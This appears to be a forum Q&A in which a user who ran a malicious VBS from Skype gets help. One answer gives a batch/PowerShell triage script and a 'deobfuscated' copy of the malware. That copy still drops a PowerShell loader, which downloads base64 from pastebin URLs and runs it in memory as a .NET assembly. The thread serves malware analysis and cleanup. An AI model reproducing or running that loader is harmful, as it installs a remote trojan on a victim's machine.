# Received a possible malware .vbs on Skype and ran it

Tags: malware, vbscript

I received a vbs file on Skype from someone I thought I knew and against my best judgement I ran it.

Can someone please tell me what it does?

Here's the vbs file code - https://pastebin.com/HPA9DaP1

I have already deleted the file it added to the startup folder.
I have also checked that the file C:\Windows\Microsoft.Net\Framework\v2.0.50727\MSBuild.exe has not been modified recently.

Anything else I need to check or any other action I need to take?

Any help would be greatly appreciated!

Comment: Delete this one also"C:\Users\Public\Videos\testnet.ps1"

Comment: It downloaded a payload also, but its encrypted, cant tell what it does>>>>>https://pastebin.com/raw/5gikCGQ7

Comment: Back up important files quick, keep them offline, in case this is ransomware.

Comment: It appears the original script, downloaded multiple payloads, from multiple locations.  Those multiple payloads were combined into a single encrypted PowerShell script.

Answer (score 1):

I made a batch file in order to find the location of the vbs malware and get its code source from the stratup folders :

***[Processes_Services_Tasks_Startup.bat](https://pastebin.com/ZvWS1XL6)***

---

```
<# : Batch portion
@rem # The previous line does nothing in Batch, but begins a multiline comment block
@rem # in PowerShell.  This allows a single script to be executed by both interpreters.
@echo off
cls & color 9E & Mode 95,5
Title Running Processes - Scheduled Tasks - Services - Startup items by Hackoo 2021
If [%1] NEQ [Admin] Goto RunAsAdmin

echo(
echo(                ===========================================================
echo(                    Please wait a while ... Working is in progress....
echo(                ===========================================================

Set "Filter_Ext=%Temp%\Filter_Ext"
Call :GetFileNameWithDateTime MyDate
Set "Log=%~dpn0_%Computername%_%MyDate%.txt"
Set "Lnk_Target_Path_Log=%~dp0Lnk_Target_Path_Log.txt"
Set "All_Users=%ProgramData%\Microsoft\Windows\Start Menu\Programs\Startup"
Set "Current_User=%UserProfile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
set "Winlogonkey=HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
Set "ImageFileExec_Key=HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"
Set StartupFolders="%All_Users%" "%Current_User%"
If Exist "%Log%" Del "%Log%"
Set "VbsFile=%Tmp%\%~n0.vbs"
Call :Generate_VBS_File

  Powershell ^
  Get-WmiObject Win32_Process ^
| where commandline -NE $null ^
| Select-Object ProcessID,Name,CommandLine ^
| ft -Autosize -Wrap ^
| Findstr /I /V "Admin" ^
| Findstr /I /V "Get-WmiObject" ^
| Out-File "'%Log%'" -Encoding  ASCII 

  Powershell ^
  Get-CimInstance Win32_StartupCommand ^
| Select-Object Name,command,Location,user ^
| Format-List ^
| Out-File -Append "'%Log%'" -Encoding  ASCII

>"%Lnk_Target_Path_Log%" (
    @For %%A in (%StartupFolders%) Do (
        Call :Execute_VBS_File "%%~A"
    )
)

>> "%Log%" (Type "%Lnk_Target_Path_Log%")

> "%Filter_Ext%" (
    echo .vbs
    echo .vbe
    echo .js
    echo .jse
    echo .bat
    echo .cmd
    echo .ps1
)

@for /f "delims=" %%a in ('Type "%Lnk_Target_Path_Log%" ^| Findstr /I /G:"%Filter_Ext%"') do (
    @for /f "tokens=2 delims==" %%b in ('echo %%a') do (
        >> "%Log%" 2>&1 (
            echo(
            echo ===================================================================================
            echo( Source code of TargetPath=%%b
            echo ===================================================================================
            Type %%b
        )
    )
)

Del "%Filter_Ext%" /F >nul 2>&1
Del "%Lnk_Target_Path_Log%" >nul 2>&1
SetLocal EnableDelayedExpansion
>> "%Log%" (
    echo(
    echo ****************************************************************************************************
    echo(                                 No Microsoft Scheduled Tasks List
    echo ****************************************************************************************************
    @for /f "delims=" %%I in ('powershell -noprofile "iex (${%~f0}|out-string)"') do echo %%I
    REM @For /F "tokens=2,9,17,19,20,21,22 delims=," %%a in ('SCHTASKS /Query /NH /FO CSV /V ^|find /I /V "Microsoft" ^|findstr /I /C:"VBS" /C:"EXE"') do (
    REM Set TaskName=%%~a
    REM Set TaskPath=%%~b
    REM Call :Trim_Dequote !TaskName! TaskName
    REM Call :Trim_Dequote !TaskPath! TaskPath
    REM echo "!TaskName!"
    REM echo "!TaskPath!"
    REM echo %%c;%%d;%%f;%%g
    REM echo( ---------------------------------------------------------------------------------------------------
    REM )
)

>> "%Log%" (
    echo(
    echo ****************************************************************************************************
    echo(                                 No Microsoft Services List
    echo ****************************************************************************************************
@for /f "tokens=*" %%a in (
    'WMIC service where "Not PathName like '%%Micro%%' AND Not PathName like '%%Windows%%'" get Name^,DisplayName^,PathName^,Status'
    ) do (
        @for /f "delims=" %%b in ("%%a") do (
            echo %%b
            )
    )
)

>> "%Log%" (
    echo(
    echo ****************************************************************************************************
    echo %Winlogonkey%
    Reg Query "%Winlogonkey%" | find /I "userinit"
    @for /f "delims=" %%a in ('Reg Query "%ImageFileExec_Key%" /f "*.exe" ^|findstr /I /V ":"') do (
        @for /f "delims=" %%b in ('Reg Query "%%~a" /s /f "Debugger" ^|findstr /I /V "0" ^|findstr /I /V "1"') do (
            echo %%b
        )
    )
)

Call :ExtractCmdLine_Hashes
If Exist "%Log%" Start /MAX "Log" "%Log%" & Exit 
::-----------------------------------------------------------------------------------
:Trim_Dequote <Var> <NewVar>
(
    echo    Wscript.echo Trim_Dequote("%~1"^)
    echo    Function Trim_Dequote(S^)
    echo    If Left(S, 1^) = """" And Right(S, 1^) = """" Then Trim_Dequote = Trim(Mid(S, 2, Len(S^) - 2^)^) Else Trim_Dequote = Trim(S^)
    echo    End Function
)>"%VbsFile%"
for /f "delims=" %%a in ('Cscript //nologo "%VbsFile%"') do ( 
    set "%2=%%a" 
)
Del "%VbsFile%" /F >nul 2>&1
exit /b
REM ------------------------------------------------------------------------------
:GetFileNameWithDateTime <FileName>
for /f "skip=1" %%x in ('wmic os get localdatetime') do if not defined MyDate set "MyDate=%%x"
set "%1=%MyDate:~0,4%-%MyDate:~4,2%-%MyDate:~6,2%-%MyDate:~8,2%-%MyDate:~10,2%"
Exit /B
REM -----------------------------------------------------------------------------
:Generate_VBS_File
>"%VbsFile%" ( 
    echo    Option Explicit
    echo    Dim Ws,objStartFolder,objFSO,objFolder,colFiles
    echo    Dim objFile,strFilePath,Lnk,Title
    echo    Title = "Extracting Target Path from .lnk and .url files by Hackoo 2020"
    echo    Set Ws = CreateObject("Wscript.Shell"^)
    echo    If WSH.Arguments.Count = 0 Then MsgBox "Missing Arguments",vbExclamation,Title : Wscript.Quit(1^)
    echo    objStartFolder = WSH.Arguments(0^)
    echo    Set objFSO = CreateObject("Scripting.FileSystemObject"^)
    echo    Set objFolder = objFSO.GetFolder(objStartFolder^)
    echo    Set colFiles = objFolder.Files
    echo    For Each objFile in colFiles
    echo    strFilePath = objFile.Path
    echo      If Ucase(objFSO.GetExtensionName(strFilePath^)^) = "LNK"_
    echo       Or Ucase(objFSO.GetExtensionName(strFilePath^)^) = "URL" Then
    echo          Call ExtractTargetPath(strFilePath^)
    echo      End If
    echo    Next
    echo    '-------------------------------------------------------------
    echo    Sub ExtractTargetPath(Lnk^)
    echo    set Lnk = Ws.Createshortcut(Lnk^)
    echo    WScript.echo "Link="^& DblQuote(Lnk^) ^& vbcrlf ^&_
    echo    "Target="^& DblQuote(Lnk.TargetPath^) ^& vbcrlf ^&_
    echo    String(100,"-"^)
    echo    End Sub
    echo    '-------------------------------------------------------------
    echo    Function DblQuote(Str^)
    echo        DblQuote = Chr(34^) ^& Str ^& Chr(34^)
    echo    End Function
    echo    '-------------------------------------------------------------
)
Exit /B
REM -----------------------------------------------------------------------------
:Execute_VBS_File
cscript //nologo "%VbsFile%" "%~1"
Exit /B
REM -----------------------------------------------------------------------------
:RunAsAdmin
cls & color 9E & Mode 95,5
echo(
echo(               ===========================================================
echo(                    Please wait a while ... Running as Admin ....
echo(               ===========================================================
Powershell start -verb runas '%0' Admin & Exit
REM -----------------------------------------------------------------------------
:ExtractCmdLine_Hashes
Rem Killing all Processes that have a status not responding
Taskkill /f /fi "status eq not responding">nul 2>&1
Set "LogScan=%~dp0Log_Scan"
If Not Exist "%LogScan%" MD "%LogScan%"
Set "Abs_cmdline=%LogScan%\%~n0_Abs_cmdline.txt"
Set "Tmp_cmdline=%LogScan%\%~n0_Tmp_cmdline.txt
Set "cmdline=%LogScan%\%~n0_cmdline.txt
Set "TmpHashes=%LogScan%\%~n0_TmpHashes.txt"
Set "Hashes=%LogScan%\%~n0_Hashes.txt"
Set "Hash2Check_VirusTotal=%LogScan%\Hash2Check_VirusTotal.txt"
For %%a in ("%Abs_cmdline%" "%Tmp_cmdline%" "%TmpHashes%" "%Hash2Check_VirusTotal%") Do If Exist "%%a" Del "%%a"
Set ProcessNames="wscript.exe" "cmd.exe" "powershell.exe" "cscript.exe"
SetLocal EnableDelayedExpansion
for %%A in (%ProcessNames%) Do (
    REM echo(
    REM echo Please Wait a while ... Looking for any instance of %%A ...
    Call :GetCommandLine %%A>nul 2>&1 
)
Timeout /T 1 /NoBreak>nul
Call :Extract "%Abs_cmdline%" "%Tmp_cmdline%"
for /f "delims=" %%a in ('Type "%Tmp_cmdline%"') do (
    for /f "skip=1 delims=" %%H in ('CertUtil -hashfile "%%~a" SHA256 ^| findstr /i /v "CertUtil"') do set "H=%%H"
        REM echo %%a=!H: =!
        echo %%a=!H: =! >> "%TmpHashes%"
)

Call :RemoveDuplicateEntry "%TmpHashes%" "%Hashes%"
Call :RemoveDuplicateEntry "%Tmp_cmdline%" "%cmdline%"
If exist "%TmpHashes%" Del "%TmpHashes%" & If exist "%Tmp_cmdline%" Del "%Tmp_cmdline%"

for /f "tokens=1,2 delims==" %%a in ('Type "%Hashes%"') do (
    If /I "%%~xa"==".vbs" MD "%LogScan%\VBS">nul 2>&1 & Type "%%a" > "%LogScan%\VBS\%%~nxa.txt"
    If /I "%%~xa"==".vbe" MD "%LogScan%\VBE">nul 2>&1 & Type "%%a" > "%LogScan%\VBE\%%~nxa.txt"
    If /I "%%~xa"==".js"  MD "%LogScan%\JS">nul  2>&1 & Type "%%a" > "%LogScan%\JS\%%~nxa.txt"
    If /I "%%~xa"==".jse" MD "%LogScan%\JSE">nul 2>&1 & Type "%%a" > "%LogScan%\JSE\%%~nxa.txt"
    If /I "%%~xa"==".bat" MD "%LogScan%\BAT">nul 2>&1 & Type "%%a" > "%LogScan%\BAT\%%~nxa.txt"
    If /I "%%~xa"==".cmd" MD "%LogScan%\CMD">nul 2>&1 & Type "%%a" > "%LogScan%\CMD\%%~nxa.txt"
    If /I "%%~xa"==".ps1" MD "%LogScan%\PS1">nul 2>&1 & Type "%%a" > "%LogScan%\PS1\%%~nxa.txt"
    If /I "%%~xa"==".wsf" MD "%LogScan%\WSF">nul 2>&1 & Type "%%a" > "%LogScan%\WSF\%%~nxa.txt"
    Set "Hash=%%b"
    Set "Hash=!Hash: =!
    IF {!Hash!} NEQ {!CMD_HASH!} (
        IF {!Hash!} NEQ {!PS_HASH!} (
            echo https://www.virustotal.com/#/file/%%b>>"%Hash2Check_VirusTotal%"
            Start "Chek SHA256 on VIRUSTOTAL" "https://www.virustotal.com/old-browsers/file/%%b"
        )
    )
)
::Start "" /MAX "%Hashes%" 
::Start "" /MAX "%cmdline%"
Exit /B
::********************************************************************************************************
:GetCommandLine <ProcessName>
Set "ProcessCmd="
for /f "tokens=2 delims==" %%P in ('wmic process where caption^="%~1" get commandline /format:list ^| findstr /I "%~1" ^| find /I /V "%~nx0" 2^>nul') do (
    Set "ProcessCmd=%%P"
    REM echo !ProcessCmd!
    echo !ProcessCmd! >> "%Abs_cmdline%"
)
Exit /b
::********************************************************************************************************
:Extract <InputData> <OutPutData>
(
echo Data = WScript.StdIn.ReadAll
echo Data = Extract(Data,"(^?^!.*(\x22\w\W^)^).*(\.ps1^|\.vbs^|\.vbe^|\.js^|\.jse^|\.cmd^|\.bat^|\.wsf^|\.exe^)(^?^!.*(\x22\w\W^)^)"^)
echo WScript.StdOut.WriteLine Data
echo Function Extract(Data,Pattern^)
echo    Dim oRE,oMatches,Match,Line
echo    set oRE = New RegExp
echo    oRE.IgnoreCase = True
echo    oRE.Global = True
echo    oRE.Pattern = Pattern
echo    set oMatches = oRE.Execute(Data^)
echo    If not isEmpty(oMatches^) then
echo        For Each Match in oMatches  
echo            Line = Line ^& Trim(Match.Value^) ^& vbcrlf
echo        Next
echo        Extract = Line 
echo    End if
echo End Function
)>"%tmp%\%~n0.vbs"
cscript /nologo "%tmp%\%~n0.vbs" < "%~1" > "%~2"
If Exist "%tmp%\%~n0.vbs" Del "%tmp%\%~n0.vbs"
exit /b
::****************************************************
::----------------------------------------------------
:RemoveDuplicateEntry <InputFile> <OutPutFile>
Powershell  ^
$Contents=Get-Content "'%1'";  ^
$LowerContents=$Contents.ToLower(^);  ^
$LowerContents ^| select -unique ^| Out-File "'%2'"
Exit /b
::----------------------------------------------------
: end Batch / begin PowerShell hybrid code #>
Function getTasks($path) {
    $out = @()
    # Get root tasks
    $schedule.GetFolder($path).GetTasks(0) | % {
        $xml = [xml]$_.xml
        $out += New-Object psobject -Property @{
            "Name" = $_.Name
            "Path" = $_.Path
            "LastRunTime" = $_.LastRunTime
            "NextRunTime" = $_.NextRunTime
            "Actions" = ($xml.Task.Actions.Exec | % { "$($_.Command) $($_.Arguments)" }) -join "`n"
"==============" = "===================================================================================="
        }
    }
    # Get tasks from subfolders
    $schedule.GetFolder($path).GetFolders(0) | % {
        $out += getTasks($_.Path)
    }
    #Output
    $out
}
$tasks = @()
$schedule = New-Object -ComObject "Schedule.Service"
$schedule.Connect() 
# Start inventory
$tasks += getTasks("\")
# Close com
[System.Runtime.Interopservices.Marshal]::ReleaseComObject($schedule) | Out-Null
Remove-Variable schedule

# To show All No Microsoft Scheduled Tasks
$tasks | ? { $_.Path -notmatch "Micro*" } | Out-String -Width 450
```

---

I got the vbscript code and i modified it with other variables (deobfuscated version), in order to be more readable and easy to understand what he can do, but don't worry this a commented vbscript is safe:

---

```
Dim WS,StartupFolder,ThisVbscript,Powershell_Script,Powershell_Script_Contents
Set WS = CreateObject("wscript.shell")
StartupFolder = WS.Specialfolders("Startup")
ThisVbscript = wscript.ScriptFullName
Set FSO = CreateObject("Scripting.FileSystemObject")
'FSO.CopyFile ThisVbscript , StartupFolder & "\" I commented this line to not make a copy in the StartupFolder
'chr(80) +"ow" & "ershell = Powershell because chr(80) = P
'Powershell_Script = chr(80) +"ow" & "ershell -noexit -exec bypass -file ""C:\Users\Public\Videos\testnet.ps1"""
Powershell_Script_Contents = "$frame2 = [System.IO.File]::Exists('C:\Windows\Microsoft.Net\Framework\v2.0.50727\MSBuild.exe');$Cli555=((New-Object Net.WebClient).DOWNLOADSTRING.Invoke('https://pastebin.com/raw/5gikCGQ7').replace('@','A').replace('#','B').replace('~','E'));[Reflection.Assembly]::Load([Convert]::FromBase64String($Cli555)).EntryPoint.invoke($2000 - $2000,$null);else{$Cli444=((New-Object Net.WebClient).DOWNLOADSTRING.Invoke('https://pastebin.com/raw/c1UeaJfG').replace('@','A').replace('#','B').replace('~','E'));[Reflection.Assembly]::Load([Convert]::FromBase64String($Cli444)).EntryPoint.invoke($2000 - $2000,$null)};Start-Sleep -s 15;"
Set F = CreateObject("Scripting.FileSystemObject")
Set File = F.CreateTextFile("C:\Users\Public\Videos\testnet.ps1",True)
File.Write Powershell_Script_Contents ' You can find the Powershell script in this location "C:\Users\Public\Videos\testnet.ps1"
File.Close
wscript.echo Powershell_Script_Contents ' This is the contents of the powershell payload it just echo its contents and don't execute it
'WScript.Sleep 3000
REM WS.Don't Run Powershell_Script,0 ' I commented this last line to be safe and don't run the palyload powershell script
```

---

So this vbscript download multiple payloads, from multiple locations.

Those multiple payloads were combined into a single encoded PowerShell script (base64). And decode it into a Malware Executable file (Trojan)